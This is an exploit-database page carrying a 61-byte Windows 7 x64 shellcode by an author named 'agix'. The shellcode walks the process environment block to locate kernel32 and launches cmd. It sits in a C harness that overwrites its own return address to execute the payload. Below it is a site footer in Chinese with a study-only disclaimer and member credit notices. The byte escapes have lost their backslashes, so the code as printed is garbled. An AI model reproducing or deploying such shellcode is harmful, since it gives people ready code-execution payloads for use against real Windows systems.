/* | Title: windows Seven x64 (cmd) Shellcode 61 Bytes | Type: Shellcode | Author: agix | Platform: win32 | Info: Tested on Windows Seven Pro Fr, Ultimate En, Premium Home En */ 1 ____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################## 1 0 I'm agix member from Inj3ct0r Team 1 1 ################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #include <stdio.h> char shellcode[] = "x31xC9" //xor ecx,ecx "x64x8Bx71x30" //mov esi,[fs:ecx+0x30] "x8Bx76x0C" //mov esi,[esi+0xc] "x8Bx76x1C" //mov esi,[esi+0x1c] "x8Bx36" //mov esi,[esi] "x8Bx06" //mov eax,[esi] "x8Bx68x08" //mov ebp,[eax+0x8] "xEBx20" //jmp short 0x35 "x5B" //pop ebx "x53" //push ebx "x55" //push ebp "x5B" //pop ebx "x81xEBx11x11x11x11" //sub ebx,0x11111111 "x81xC3xDAx3Fx1Ax11" //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6) "xFFxD3" //call ebx "x81xC3x11x11x11x11" //add ebx,0x11111111 "x81xEBx8CxCCx18x11" //sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7) "xFFxD3" //call ebx "xE8xDBxFFxFFxFF" //call dword 0x15 //db "cmd" "x63x6dx64"; int main(int argc, char **argv) { int *ret; ret = (int *)&ret + 2; (*ret) = (int) shellcode; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论